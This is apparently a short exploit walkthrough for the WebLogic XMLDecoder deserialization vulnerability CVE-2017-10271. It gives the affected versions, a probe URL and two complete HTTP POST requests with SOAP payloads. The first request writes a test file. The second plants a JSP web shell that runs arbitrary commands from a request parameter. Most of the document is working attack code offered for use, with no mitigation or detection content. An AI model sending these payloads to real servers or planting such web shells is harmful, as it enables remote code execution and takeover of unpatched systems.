weblogic deserialization vulnerability (CVE-2017-10271)

Affected version

Affected WebLogic version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0

Exploit

1: Preliminary judgment visit
http://x.x.x.x:7001/wls-wsat/CoordinatorPortType11, the
existence of the following figure indicates that there may be loopholes

2: Construct a POST package for testing and write test.txt

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 1353

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
         <java version="1.6.0" class="java.beans.XMLDecoder">
                    <object class="java.io.PrintWriter"> 
                        <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/cmd.jsp</string><void method="println">
                        <string>
xmldecoder_vul_test
</string></void><void method="close"/>
                    </object>
            </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
</soapenv:Envelope>

3: write cmd pony

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 1353

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
         <java version="1.6.0" class="java.beans.XMLDecoder">
                    <object class="java.io.PrintWriter"> 
                        <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/cmd.jsp</string><void method="println">
                        <string>
<![CDATA[
<%@ page import="java.util.*,java.io.*"%>
 <%
 %>
 <HTML><BODY>
 Commands with JSP
 <FORM METHOD="GET" NAME="myform" ACTION="">
 <INPUT TYPE="text" NAME="cmd">
 <INPUT TYPE="submit" VALUE="Send">
 </FORM>
 <pre>
 <%
 if (request.getParameter("cmd") != null) {
 out.println("Command: " + request.getParameter("cmd") + "<BR>");
 Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
 OutputStream os = p.getOutputStream();
 InputStream in = p.getInputStream();
 DataInputStream dis = new DataInputStream(in);
 String disr = dis.readLine();
 while ( disr != null ) {
 out.println(disr);
 disr = dis.readLine();
 }
 }
 %>
 </pre>
 </BODY></HTML>
]]>
</string></void><void method="close"/>
                    </object>
            </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
</soapenv:Envelope>